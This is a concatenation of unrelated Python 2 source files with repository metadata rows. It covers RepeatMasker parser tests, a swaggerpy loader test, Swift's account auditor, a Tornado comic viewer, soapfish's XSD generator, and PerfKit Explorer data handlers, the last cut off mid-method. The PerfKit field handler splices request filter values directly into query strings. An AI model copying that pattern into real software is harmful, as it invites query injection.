alig_2_header = "318 22.50 3.61 0.00 chr1 15266 15323 (249235276) C " +\
"MIR3#SINE/MIR (65) 143 84 m_b1s601i1 10"
alig_2 = " chr1 15266 GAAACT--GGCCCAGAGAGGTGAGGCAGCG 15293 \n" +\
" -- i iii \n" +\
"C MIR3#SINE/MIR 143 GAAACTGAGGCCCAGAGAGGTGAAGTGACG 114 \n" +\
" \n" +\
" chr1 15294 GGTCACAGAGCAAGGCAAAAGCGCGCTGGG 15323 \n" +\
" v ? vi ivi v \n" +\
"C MIR3#SINE/MIR 113 GGTCACACAGCKAGTTAGTGGCGAGCTGGG 84"
alig_2_m = "Matrix = 25p47g.matrix \n" +\
"Kimura (with divCpGMod) = 26.25 \n" +\
"Transitions / transversions = 2.40 (12/5) \n" +\
"Gap_init rate = 0.03 (2 / 79), avg. gap size = 1.50 (3 / 2)"
alig_3_header = "18 23.18 0.00 1.96 chr1 15798 15830 (249234772) " +\
"(TGCTCC)n#Simple_repeat 1 32 (0) m_b1s252i0 15"
alig_3 = " chr1 15798 GCTGCTTCTCCAGCTTTCGCTCCTTCATGCT 15828 \n" +\
" v v v iii v - v \n" +\
" (TGCTCC)n#Sim 1 GCTCCTGCTCCTGCTCCTGCTCCTGC-TCCT 30 \n" +\
" \n" +\
" chr1 15829 GC 15830 \n" +\
" \n" +\
" (TGCTCC)n#Sim 31 GC 32 "
alig_3_m = "Matrix = Unknown \n" +\
"Transitions / transversions = 0.43 (3/7) \n" +\
"Gap_init rate = 0.02 (1 / 51), avg. gap size = 1.00 (1 / 1)"
alig_4_header = "487 20.75 0.93 0.93 chr1 158389 158409 (249092126) C " +\
"Charlie29b#DNA/hAT-Charlie (532) 662 641 m_b3s502i21 231"
alig_4 = " chr1 158389 TAGAATTTTTGTGGCAT-ATGA 158409 \n" +\
" i ii v ii - vi \n" +\
"C Charlie29b#DN 662 TAAAGCTGGGCGTTATTGATGA 641 \n"
alig_4_m = ""
self.rm_tc1_records = [alig_1_header + "\n\n" + alig_1 + "\n\n" + alig_1_m,
alig_2_header + "\n\n" + alig_2 + "\n\n" + alig_2_m,
alig_3_header + "\n\n" + alig_3 + "\n\n" + alig_3_m,
alig_4_header + "\n\n" + alig_4 + "\n\n" + alig_4_m]
self.rm_rc_1_input = "\n\n".join(self.rm_tc1_records)
def test_rm_iter_one_part_ann_line(self):
"""
    This test for the repeatmasker iterator has an annotation line with just a
    single element in it; this exposes a bug that previously existed (now
    fixed) where the lines were expected to have >= 2 elements.
"""
debug = False
# set up test
alig_header = "10304 12.32 4.41 4.46 chrUn_gl000247 36396 36422 (0) " +\
"MER57-int#LTR/ERV1 5219 5245 (1398) m_b1s701i6 4562661"
alig = " chrUn_gl00024 36396 TTAATGTGAACAGCTTTTCCCAAGATC 36422\n" +\
" i \n" +\
" MER57-int#LTR 5219 TTGATGTGAACAGCTTTTCCCAAGATC 5245"
test_in = alig_header + "\n\n" + alig
# run test and collect results
results = [r for r in
repeat_masker_alignment_iterator(StringIO.StringIO(test_in))]
self.failUnlessEqual(len(results), 1)
rm_str = _to_repeatmasker_string(results[0], m_name_width=13)
# check results
alig_actual = [x for x in map(str.rstrip, test_in.split("\n"))
if x.strip() != ""]
alig_result = [x for x in map(str.rstrip, rm_str.split("\n"))
if x.strip() != ""]
if debug:
print ""
print "expected: " + str(alig_actual)
print "got: " + str(alig_result)
self.failUnlessEqual(alig_actual, alig_result)
def test_repeat_masker_alignment_iterator(self):
"""Test roundtrip of repeatmasker alignment."""
debug = False
s_io = StringIO.StringIO(self.rm_rc_1_input)
alig_iter = repeat_masker_alignment_iterator(s_io)
results = [r for r in alig_iter]
self.failUnlessEqual(len(results), len(self.rm_tc1_records))
for i, trail_meta_size, c_width, m_width in [(0, 4, 29, None),
(1, 4, 30, None),
(2, 3, 31, 13),
(3, 0, 22, 13)]:
rm_str = _to_repeatmasker_string(results[i], column_width=c_width,
m_name_width=m_width)
if debug:
sys.stderr.write("===============================\n")
sys.stderr.write(rm_str + "\n")
sys.stderr.write("*******************************\n")
sys.stderr.write(self.rm_tc1_records[i] + "\n")
sys.stderr.write("===============================\n")
      # strip out the last few lines; these should all be there, but order
      # isn't important.
alig_actual = [x for x in map(str.rstrip,
self.rm_tc1_records[i].split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_actual = map(str.rstrip,
self.rm_tc1_records[i].split("\n")[-trail_meta_size:])
alig_result = [x for x in map(str.rstrip,
rm_str.split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_result = map(str.rstrip, rm_str.split("\n")[-trail_meta_size:])
if debug:
sys.stderr.write(str(alig_actual) + "\n")
sys.stderr.write(str(alig_result) + "\n")
self.failUnlessEqual(alig_actual, alig_result)
self.failUnlessEqual(set(meta_actual), set(meta_result))
def test_repeat_masker_on_demand_load(self):
"""
Tests wrapping the alignment iterator in an index and using this index
to build RM alignment objects that are loaded on-demand from the indexed
stream.
"""
from pyokit.io.indexedFile import IndexedFile
def extract_UID(rm_alignment):
return rm_alignment.meta[RM_ID_KEY]
s_io = StringIO.StringIO(self.rm_rc_1_input)
index = IndexedFile(s_io, repeat_masker_alignment_iterator, extract_UID)
for i, trail_meta_size, c_width, m_width, rm_id in [(0, 4, 29, None, 5),
(1, 4, 30, None, 10),
(2, 3, 31, 13, 15),
(3, 0, 22, 13, 231)]:
on_d_alig = JustInTimePairwiseAlignment(index, rm_id)
on_d_str = _to_repeatmasker_string(on_d_alig, column_width=c_width,
m_name_width=m_width)
      # strip out the last few lines; these should all be there, but order
      # isn't important.
alig_actual = [x for x in map(str.rstrip,
self.rm_tc1_records[i].split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_actual = map(str.rstrip,
self.rm_tc1_records[i].split("\n")[-trail_meta_size:])
alig_result = [x for x in map(str.rstrip,
on_d_str.split("\n")[:-trail_meta_size])
if x.strip() != ""]
meta_result = map(str.rstrip, on_d_str.split("\n")[-trail_meta_size:])
self.failUnlessEqual(alig_actual, alig_result)
self.failUnlessEqual(set(meta_actual), set(meta_result))
###############################################################################
# ENTRY POINT WHEN RUN AS A STAND-ALONE MODULE #
###############################################################################
if __name__ == '__main__':
unittest.main()
|
lgpl-2.1
| 2,046,055,904,560,101,600 | 40.561497 | 90 | 0.56526 | false |
adborden/swagger-py
|
swaggerpy_test/loader_test.py
|
2
|
1213
|
#!/usr/bin/env python
#
# Copyright (c) 2013, Digium, Inc.
#
import unittest
import swaggerpy
from swaggerpy import swagger_model
class TestProcessor(swagger_model.SwaggerProcessor):
def process_resource_listing(self, resources, context):
resources['processed'] = True
class LoaderTest(unittest.TestCase):
def test_simple(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json')
self.assertEqual('1.1', uut['swaggerVersion'])
decl = uut['apis'][0]['api_declaration']
self.assertEqual(1, len(decl['models']))
self.assertEqual(1, len(decl['models']['Simple']['properties']))
def test_processor(self):
uut = swaggerpy.load_file('test-data/1.1/simple/resources.json',
processors=[TestProcessor()])
self.assertEqual('1.1', uut['swaggerVersion'])
self.assertTrue(uut['processed'])
def test_missing(self):
try:
swaggerpy.load_file(
'test-data/1.1/missing_resource/resources.json')
self.fail("Expected load failure b/c of missing file")
except IOError:
pass
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
| 4,569,353,490,463,303,700 | 27.880952 | 72 | 0.619126 | false |
garvenshen/zeda-swift
|
swift/account/auditor.py
|
1
|
5227
|
# Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import time
from random import random
import swift.common.db
from swift.account import server as account_server
from swift.common.db import AccountBroker
from swift.common.utils import get_logger, audit_location_generator, \
config_true_value, dump_recon_cache
from swift.common.daemon import Daemon
from eventlet import Timeout
class AccountAuditor(Daemon):
"""Audit accounts."""
def __init__(self, conf):
self.conf = conf
self.logger = get_logger(conf, log_route='account-auditor')
self.devices = conf.get('devices', '/srv/node')
self.mount_check = config_true_value(conf.get('mount_check', 'true'))
self.interval = int(conf.get('interval', 1800))
self.account_passes = 0
self.account_failures = 0
swift.common.db.DB_PREALLOCATION = \
config_true_value(conf.get('db_preallocation', 'f'))
self.recon_cache_path = conf.get('recon_cache_path',
'/var/cache/swift')
self.rcache = os.path.join(self.recon_cache_path, "account.recon")
def _one_audit_pass(self, reported):
all_locs = audit_location_generator(self.devices,
account_server.DATADIR,
mount_check=self.mount_check,
logger=self.logger)
for path, device, partition in all_locs:
self.account_audit(path)
if time.time() - reported >= 3600: # once an hour
self.logger.info(_('Since %(time)s: Account audits: '
'%(passed)s passed audit,'
'%(failed)s failed audit'),
{'time': time.ctime(reported),
'passed': self.account_passes,
'failed': self.account_failures})
dump_recon_cache({'account_audits_since': reported,
'account_audits_passed': self.account_passes,
'account_audits_failed':
self.account_failures},
self.rcache, self.logger)
reported = time.time()
self.account_passes = 0
self.account_failures = 0
return reported
def run_forever(self, *args, **kwargs):
"""Run the account audit until stopped."""
reported = time.time()
time.sleep(random() * self.interval)
while True:
self.logger.info(_('Begin account audit pass.'))
begin = time.time()
try:
reported = self._one_audit_pass(reported)
except (Exception, Timeout):
self.logger.increment('errors')
self.logger.exception(_('ERROR auditing'))
elapsed = time.time() - begin
if elapsed < self.interval:
time.sleep(self.interval - elapsed)
self.logger.info(
_('Account audit pass completed: %.02fs'), elapsed)
dump_recon_cache({'account_auditor_pass_completed': elapsed},
self.rcache, self.logger)
def run_once(self, *args, **kwargs):
"""Run the account audit once."""
self.logger.info(_('Begin account audit "once" mode'))
begin = reported = time.time()
self._one_audit_pass(reported)
elapsed = time.time() - begin
self.logger.info(
_('Account audit "once" mode completed: %.02fs'), elapsed)
dump_recon_cache({'account_auditor_pass_completed': elapsed},
self.rcache, self.logger)
def account_audit(self, path):
"""
Audits the given account path
:param path: the path to an account db
"""
start_time = time.time()
try:
if not path.endswith('.db'):
return
broker = AccountBroker(path)
if not broker.is_deleted():
broker.get_info()
self.logger.increment('passes')
self.account_passes += 1
self.logger.debug(_('Audit passed for %s') % broker.db_file)
except (Exception, Timeout):
self.logger.increment('failures')
self.account_failures += 1
self.logger.exception(_('ERROR Could not get account info %s'),
(broker.db_file))
self.logger.timing_since('timing', start_time)
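# A minimal sketch of constructing and running the auditor directly; the
# configuration values shown are illustrative, not recommended settings:
#
#   conf = {'devices': '/srv/node', 'mount_check': 'false', 'interval': '60'}
#   AccountAuditor(conf).run_once()
#
# In a real deployment the daemon is normally launched through swift's own
# machinery (e.g. swift-init), not instantiated by hand.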
|
apache-2.0
| -9,029,602,981,438,420,000 | 41.153226 | 79 | 0.55309 | false |
chaserhkj/PyComicCast
|
ComicCast.py
|
1
|
3515
|
#!/usr/bin/env python2
# Copyright (c) 2014 Chaserhkj
# This software is licensed under the MIT license.
# See LICENSE for more details.
import tornado.web as web
import tornado.template as template
import tornado.ioloop as ioloop
import os,sys,mimetypes
import rarfile,zipfile
supported_archive = [".zip", ".rar"]
supported_image = [".jpe", ".jpg", ".jpeg", ".gif", ".png"]
work_dir = os.getcwd()
list_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<ul>
{% for i in names %}
<li> <a href="/{{ i[0] }}/0">{{ escape(i[1]) }}</a> </li>
{% end %}
</ul>
</body>
</html>"""
)
image_template = template.Template(
"""<html>
<head>
<title>PyComicCast</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style type="text/css">
img.content {max-width:100%;}
div.content {text-align:center;}
div.navi {text-align:center;}
</style>
</head>
<body>
<div class="content">
<a href="/{{archive}}/{{image + 1}}"><img class="content" src="/{{archive}}/{{image}}/image"/></a>
</div>
<br />
<br />
<div class="navi">
<a href="/{{archive}}/{{image - 1}}">Previous</a>
<a href="/">Return</a>
<a href="/{{archive}}/{{image + 1}}">Next</a>
</div>
</body>
</html>"""
)
file_objs = {}
def get_file_list():
return [i for i in os.listdir(work_dir) if os.path.splitext(i)[1].lower() in supported_archive]
def get_file_obj(index):
name = get_file_list()[index]
    if name not in file_objs:
if name.endswith(".rar"):
obj = rarfile.RarFile(os.path.join(work_dir, name))
elif name.endswith(".zip"):
obj = zipfile.ZipFile(os.path.join(work_dir, name))
else:
raise Exception, "Not supported archive file!"
img_list = [i for i in obj.namelist() if os.path.splitext(i)[1].lower() in supported_image]
img_list.sort()
file_objs[name] = (obj, img_list)
return file_objs[name]
class RootHandler(web.RequestHandler):
def get(self):
self.write(list_template.generate(names=enumerate(get_file_list())))
class ImagePageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
max_index = len(get_file_obj(archive)[1])
if image < 0 or image >= max_index:
self.redirect("/")
return
self.write(image_template.generate(archive=archive,image=image))
class ImageHandler(web.RequestHandler):
def get(self, archive, image):
image = int(image)
archive = int(archive)
obj = get_file_obj(archive)
mimetype = mimetypes.guess_type(obj[1][image])
img = obj[0].open(obj[1][image])
self.set_header("Content-Type", mimetype[0])
while True:
data = img.read(2048)
if not data:
break
self.write(data)
application = web.Application([
(r"/", RootHandler),
(r"/(\d+)/(-?\d+)", ImagePageHandler),
(r"/(\d+)/(-?\d+)/image", ImageHandler)
])
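# URL scheme implied by the routes above (host and port assume the defaults
# used in __main__ below): "/" lists the archives found in work_dir,
# "/0/0" renders the first page of the first archive as HTML, and
# "/0/0/image" serves the raw image bytes for that page.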
if __name__=="__main__":
if len(sys.argv) >= 2:
work_dir = sys.argv[1]
application.listen(8888)
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
print "Exiting..."
|
mit
| 7,905,393,709,264,332,000 | 27.346774 | 106 | 0.565576 | false |
vpistis/soapfish
|
soapfish/py2xsd.py
|
1
|
11116
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import argparse
import imp
import inspect
import itertools
import logging
import six
import textwrap
from lxml import etree
from . import namespaces as ns
from . import xsd, xsdspec
from .compat import basestring
from .utils import uncapitalize
NUMERIC_TYPES = [xsd.Decimal, xsd.Integer, xsd.Int, xsd.Long, xsd.Short,
xsd.UnsignedByte, xsd.UnsignedInt, xsd.UnsignedLong, xsd.UnsignedShort,
xsd.Double, xsd.Float, xsd.Byte]
STRING_TYPES = [xsd.QName, xsd.AnyURI, xsd.Base64Binary, xsd.QName,
xsd.AnyType, xsd.Duration]
ALL_TYPES = NUMERIC_TYPES + STRING_TYPES
logger = logging.getLogger('soapfish')
# --- Helpers -----------------------------------------------------------------
def get_xsd_type(_type):
'''
    Check whether _type is a basic type in the XSD scope; otherwise it must be
    a user-defined type.
'''
base_class = _type.__class__.__bases__[0]
if base_class == xsd.SimpleType or _type.__class__ in ALL_TYPES:
return 'xsd:' + uncapitalize(_type.__class__.__name__)
else:
return 'sns:' + uncapitalize(_type.__class__.__name__)
def xsd_attribute(attribute):
xsdattr = xsdspec.Attribute()
xsdattr.name = attribute._name
xsdattr.use = attribute.use
xsdattr.type = get_xsd_type(attribute._type)
return xsdattr
def create_xsd_element(element):
xsd_element = xsdspec.Element()
xsd_element.name = element.tagname if element.tagname else element._name
xsd_element.nillable = element.nillable
xsd_element.minOccurs = element._minOccurs
if hasattr(element, '_maxOccurs'):
xsd_element.maxOccurs = element._maxOccurs
# SimpleType defined in place.
parent_type = element._type.__class__.__bases__[0]
_type = element._type
if not inspect.isclass(element._passed_type):
xsd_element.simpleType = xsdspec.SimpleType()
xsd_element.simpleType.restriction = xsdspec.Restriction()
xsd_element.simpleType.restriction.base = get_xsd_type(element._type)
if hasattr(element._type, 'enumeration') and element._type.enumeration\
and parent_type == xsd.SimpleType:
for value in element._type.enumeration:
enum = xsdspec.Enumeration.create(value)
xsd_element.simpleType.restriction.enumerations.append(enum)
if hasattr(_type, 'fractionDigits') and _type.fractionDigits:
xsd_element.simpleType.restriction.fractionDigits = xsdspec.RestrictionValue(value=str(_type.fractionDigits))
if hasattr(_type, 'pattern') and _type.pattern:
xsd_element.simpleType.restriction.pattern = xsdspec.Pattern(value=str(_type.pattern))
if hasattr(_type, 'minInclusive') and _type.minInclusive:
xsd_element.simpleType.restriction.minInclusive = xsdspec.RestrictionValue(value=str(_type.minInclusive))
if hasattr(_type, 'minExclusive') and _type.minExclusive:
xsd_element.simpleType.restriction.minExclusive = xsdspec.RestrictionValue(value=str(_type.minExclusive))
if hasattr(_type, 'maxExclusive') and _type.maxExclusive:
xsd_element.simpleType.restriction.maxExclusive = xsdspec.RestrictionValue(value=str(_type.maxExclusive))
if hasattr(_type, 'maxInclusive') and _type.maxInclusive:
xsd_element.simpleType.restriction.maxInclusive = xsdspec.RestrictionValue(value=str(_type.maxInclusive))
if hasattr(_type, 'totalDigits') and _type.totalDigits:
xsd_element.simpleType.restriction.totalDigits = xsdspec.RestrictionValue(value=str(_type.totalDigits))
else:
xsd_element.type = get_xsd_type(element._type)
return xsd_element
def xsd_complexType(complexType, named=True):
xsd_ct = xsdspec.XSDComplexType()
if named:
xsd_ct.name = uncapitalize(complexType.__name__)
for attribute in complexType._meta.attributes:
xsd_attr = xsd_attribute(attribute)
xsd_ct.attributes.append(xsd_attr)
    # Elements can be wrapped in a few kinds of containers:
    # sequence, all or choice; alternatively it can be a complexContent with
    # an extension or restriction.
if hasattr(complexType, 'INDICATOR') and complexType.INDICATOR is not None:
xsd_sequence = xsdspec.Sequence()
setattr(xsd_ct, complexType.INDICATOR.__name__.lower(), xsd_sequence)
container = xsd_sequence
else:
container = xsd_ct
for element in complexType._meta.fields:
for element_ in element.xsd_elements():
if element_._type is None:
# The type must be known in order to generate a valid schema. The
                # error occurred when using the built-in WSDL generation but I was
# unable to reproduce the error condition in a test case.
# Forcing type evaluation fixed the problem though.
element_._evaluate_type()
xsd_element = create_xsd_element(element_)
container.elements.append(xsd_element)
return xsd_ct
def xsd_simpleType(st):
xsd_simpleType = xsdspec.SimpleType()
xsd_simpleType.name = uncapitalize(st.__name__)
xsd_restriction = xsdspec.Restriction()
xsd_restriction.base = get_xsd_type(st.__bases__[0]())
if hasattr(st, 'enumeration') and st.enumeration:
for enum in st.enumeration:
xsd_restriction.enumerations.append(xsdspec.Enumeration.create(enum))
if hasattr(st, 'fractionDigits') and st.fractionDigits:
xsd_restriction.fractionDigits = xsdspec.RestrictionValue(value=st.fractionDigits)
elif hasattr(st, 'pattern') and st.pattern:
xsd_restriction.pattern = xsdspec.Pattern(value=st.pattern)
xsd_simpleType.restriction = xsd_restriction
return xsd_simpleType
def build_imports(xsd_schema, imports):
    if imports:
        for _import in imports:
            xsd_import = xsdspec.Import()
            xsd_import.namespace = _import.targetNamespace
            if _import.location:
                xsd_import.schemaLocation = _import.location
            xsd_schema.imports.append(xsd_import)
def build_includes(xsd_schema, includes):
if includes:
for _include in includes:
xsd_include = xsdspec.Include()
if _include.location:
xsd_include.schemaLocation = _include.location
xsd_schema.includes.append(xsd_include)
def generate_xsdspec(schema):
xsd_schema = xsdspec.Schema()
xsd_schema.targetNamespace = schema.targetNamespace
xsd_schema.elementFormDefault = schema.elementFormDefault
build_imports(xsd_schema, schema.imports)
build_includes(xsd_schema, schema.includes)
for st in schema.simpleTypes:
xsd_st = xsd_simpleType(st)
xsd_schema.simpleTypes.append(xsd_st)
for ct in schema.complexTypes:
xsd_ct = xsd_complexType(ct)
xsd_schema.complexTypes.append(xsd_ct)
generate_elements(xsd_schema, schema)
return xsd_schema
def generate_elements(xsd_schema, schema):
for name, element in six.iteritems(schema.elements):
xsd_element = xsdspec.Element()
xsd_element.name = name
if isinstance(element._passed_type, basestring) or inspect.isclass(element._passed_type):
xsd_element.type = get_xsd_type(element._type)
else:
xsd_element.complexType = xsd_complexType(element._type.__class__, named=False)
xsd_schema.elements.append(xsd_element)
def generate_xsd(schema):
xsd_schema = generate_xsdspec(schema)
xmlelement = etree.Element(
'{%s}schema' % ns.xsd,
nsmap={
'sns': schema.targetNamespace,
'xsd': xsdspec.XSD_NAMESPACE,
},
)
xsd_schema.render(xmlelement,
xsd_schema,
namespace=xsdspec.XSD_NAMESPACE,
elementFormDefault=xsd.ElementFormDefault.QUALIFIED)
return xmlelement
def schema_validator(schema):
"""
Return a callable for the specified soapfish schema which can be used
to validate (etree) xml documents.
The method takes care of resolving imported (soapfish) schemas but prevents
any unwanted network access.
"""
class SchemaResolver(etree.Resolver):
def __init__(self, schemas, *args, **kwargs):
super(SchemaResolver, self).__init__(*args, **kwargs)
self._soapfish_schemas = {}
self._map(schema)
def _map(self, schema):
for item in itertools.chain(schema.imports, schema.includes):
if item.location not in self._soapfish_schemas:
self._soapfish_schemas[item.location] = item
self._map(item)
def resolve(self, url, id_, context):
if url in self._soapfish_schemas:
schema_string = etree.tostring(generate_xsd(self._soapfish_schemas[url]))
return self.resolve_string(schema_string, context)
# prevent unwanted network access
raise ValueError('can not resolve %r - not a known soapfish schema' % url)
parser = etree.XMLParser(load_dtd=True)
resolver = SchemaResolver(schema)
parser.resolvers.add(resolver)
# unfortunately we have to parse the whole schema from string so we are
    # able to configure a custom resolver just for this instance. This seems to
    # be a limitation of the lxml API.
# I tried to use '.parser.resolvers.add()' on an ElementTree instance but
# that uses the default parser which refers to a shared _ResolverRegistry
# which can not be cleared without having references to all registered
# resolvers (and we don't know these instances). Also I noticed many test
# failures (only when running all tests!) and strange behavior in
# "resolve()" (self._soapfish_schemas was empty unless doing repr() on the
# instance attribute first).
# Also having shared resolvers is not a good idea because a user might want
# to have different validator instances at the same time (possibly with
# conflicting namespace urls).
schema_xml = etree.tostring(generate_xsd(schema))
schema_element = etree.fromstring(schema_xml, parser)
xml_schema = etree.XMLSchema(schema_element)
return xml_schema.assertValid
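# A minimal usage sketch for schema_validator (the schema object and the
# document are hypothetical; illustration only):
#
#   validate = schema_validator(MySchema)  # MySchema: a soapfish xsd.Schema
#   validate(etree.fromstring('<example/>'))
#
# Since the returned callable is etree.XMLSchema.assertValid, it raises
# lxml.etree.DocumentInvalid when the document does not conform, so callers
# typically wrap the call in try/except.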
# --- Program -----------------------------------------------------------------
def parse_arguments():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent('''\
Generates an XSD document from a Python module.
'''))
parser.add_argument('module', help='The path to a python module.')
return parser.parse_args()
def main():
opt = parse_arguments()
logger.info('Generating XSD for module \'%s\'...' % opt.module)
module = imp.load_source('module.name', opt.module)
schema = getattr(module, 'Schema')
tree = generate_xsd(schema)
print(etree.tostring(tree, pretty_print=True))
if __name__ == '__main__':
main()
|
bsd-3-clause
| -7,496,999,152,012,229,000 | 37.199313 | 121 | 0.66004 | false |
GoogleCloudPlatform/PerfKitExplorer
|
server/perfkit/explorer/handlers/data.py
|
1
|
10892
|
"""Copyright 2014 Google Inc. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Main entry module for data specified in app.yaml.
This module contains the Http handlers for data requests (as JSON) in the
Perfkit Explorer application (as well as other consumers). Data URL's are
prefixed with /data/{source} in the REST API, and in general the entities are
referenced with GET requests.
"""
__author__ = 'joemu@google.com (Joe Allan Muharsky)'
import json
import logging
import MySQLdb
import time
from google.appengine.api import urlfetch_errors
from google.appengine.api import users
from google.appengine.runtime import apiproxy_errors
import google.appengine.runtime
import base
from perfkit.common import big_query_client
from perfkit.common import big_query_result_util as result_util
from perfkit.common import big_query_result_pivot
from perfkit.common import data_source_config
from perfkit.common import gae_big_query_client
from perfkit.common import gae_cloud_sql_client
from perfkit.common import http_util
from perfkit.explorer.model import dashboard
from perfkit.explorer.model import explorer_config
from perfkit.explorer.samples_mart import explorer_method
from perfkit.explorer.samples_mart import product_labels
from perfkit.ext.cloudsql.models import cloudsql_config
import webapp2
from google.appengine.api import urlfetch
DATASET_NAME = 'samples_mart'
URLFETCH_TIMEOUT = 50
ERROR_TIMEOUT = 'The request timed out.'
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
class Error(Exception):
pass
class SecurityError(Error):
pass
class DataHandlerUtil(object):
"""Class used to allow us to replace clients with test versions."""
# TODO: Refactor this out into a generic class capable of choosing
# the appropriate data_client for tests and/or product code.
@classmethod
def GetDataClient(cls, env):
"""Returns an instance of a data client for the specified environment.
This is used for testability and GAE support purposes to replace the
default GAE-enabled data client with a "local" one for running unit
tests.
Args:
env: The environment to connect to. For more detail, see
perfkit.data_clients.data_source_config.Environments.
Returns:
A valid data client.
"""
return gae_big_query_client.GaeBigQueryClient(env=env)
class FieldDataHandler(base.RequestHandlerBase):
"""Http handler for getting a list of distinct Field values (/data/fields).
This handler allows start/end date, project_name, test and metric to be
supplied as GET parameters for filtering, and field_name determines the
  field to return. It returns an array of dicts in the
following format:
[{'value': 'time-to-complete'},
{'value': 'weight'}]
"""
def get(self):
"""Request handler for GET operations."""
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
filters = http_util.GetJsonParam(self.request, 'filters')
start_date = filters['start_date']
end_date = filters['end_date']
product_name = filters['product_name']
test = filters['test']
metric = filters['metric']
field_name = self.request.GET.get('field_name')
config = explorer_config.ExplorerConfigModel.Get()
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
query = explorer_method.ExplorerQueryBase(
data_client=client,
dataset_name=config.default_dataset)
query.fields = [field_name + ' AS name']
query.tables = ['lookup_field_cube']
query.wheres = []
if start_date:
query.wheres.append(
'day_timestamp >= %s' %
(explorer_method.ExplorerQueryBase
.GetTimestampFromFilterExpression(
start_date)))
if end_date:
query.wheres.append(
'day_timestamp <= %s' %
(explorer_method.ExplorerQueryBase
.GetTimestampFromFilterExpression(
end_date)))
if product_name and field_name != 'product_name':
query.wheres.append('product_name = "%s"' % product_name)
if test and field_name not in ['test', 'product_name']:
query.wheres.append('test = "%s"' % test)
if metric and field_name not in ['metric', 'test', 'product_name']:
query.wheres.append('metric = "%s"' % metric)
query.groups = ['name']
query.orders = ['name']
response = query.Execute()
data = {'rows': response['rows']}
self.RenderJson(data)
class MetadataDataHandler(base.RequestHandlerBase):
"""Http handler for getting a list of Metadata (Label/Values).
This handler requires project_name and test to be supplied as GET
parameters, and returns an array of dicts in the following format:
[{'label': 'time-to-complete'},
{'label': 'weight', 'value': '20'}]
"""
def get(self):
"""Request handler for GET operations."""
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
config = explorer_config.ExplorerConfigModel.Get()
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
query = product_labels.ProductLabelsQuery(
data_client=client,
dataset_name=config.default_dataset)
filters = http_util.GetJsonParam(self.request, 'filters')
start_date = None
if 'start_date' in filters and filters['start_date']:
start_date = filters['start_date']
end_date = None
if 'end_date' in filters and filters['end_date']:
end_date = filters['end_date']
response = query.Execute(
start_date=start_date,
end_date=end_date,
product_name=filters['product_name'],
test=filters['test'],
metric=filters['metric'])
self.RenderJson({'labels': response['labels']})
class SqlDataHandler(base.RequestHandlerBase):
"""Http handler for returning the results of a SQL statement (/data/sql).
This handler will look for a SQL query in the POST data with a datasource
parameter. Notably, the following elements are expected:
{'datasource': {
'query': 'SELECT foo FROM bar',
'config': {
... // Unused properties for a strict SQL statement.
'results': {
'pivot': false,
'pivot_config': {
'row_field': '',
'column_field': '',
'value_field': '',
}
}
}
}
This handler returns an array of arrays in the following format:
[['product_name', 'test', 'min', 'avg'],
['widget-factory', 'create-widget', 2.2, 3.1]]
"""
def post(self):
"""Request handler for POST operations."""
try:
start_time = time.time()
urlfetch.set_default_fetch_deadline(URLFETCH_TIMEOUT)
config = explorer_config.ExplorerConfigModel.Get()
request_data = json.loads(self.request.body)
datasource = request_data.get('datasource')
if not datasource:
raise KeyError('The datasource is required to run a query')
query = datasource.get('query_exec') or datasource.get('query')
if not query:
raise KeyError('datasource.query must be provided.')
if (not config.grant_query_to_public and
not users.is_current_user_admin()):
dashboard_id = request_data.get('dashboard_id')
if not dashboard_id:
raise KeyError('The dashboard id is required to run a query')
widget_id = request_data.get('id')
if not widget_id:
raise KeyError('The widget id is required to run a query')
if dashboard.Dashboard.IsQueryCustom(query, dashboard_id, widget_id):
raise SecurityError('The user is not authorized to run custom queries')
else:
logging.error('Query is identical.')
cache_duration = config.cache_duration or None
logging.debug('Query datasource: %s', datasource)
query_config = datasource['config']
if datasource.get('type', 'BigQuery') == 'Cloud SQL':
logging.debug('Using Cloud SQL backend')
cloudsql_client_config = query_config.get('cloudsql')
if not cloudsql_client_config:
cloudsql_client_config = {}
cloudsql_server_config = cloudsql_config.CloudsqlConfigModel.Get()
client = gae_cloud_sql_client.GaeCloudSqlClient(
instance=cloudsql_client_config.get('instance'),
db_name=cloudsql_client_config.get('database_name'),
db_user=cloudsql_server_config.username,
db_password=cloudsql_server_config.password)
else:
logging.debug('Using BigQuery backend')
client = DataHandlerUtil.GetDataClient(self.env)
client.project_id = config.default_project
response = client.Query(query, cache_duration=cache_duration)
if query_config['results'].get('pivot'):
pivot_config = query_config['results']['pivot_config']
transformer = big_query_result_pivot.BigQueryPivotTransformer(
reply=response,
rows_name=pivot_config['row_field'],
columns_name=pivot_config['column_field'],
values_name=pivot_config['value_field'])
transformer.Transform()
response['results'] = (
result_util.ReplyFormatter.RowsToDataTableFormat(response))
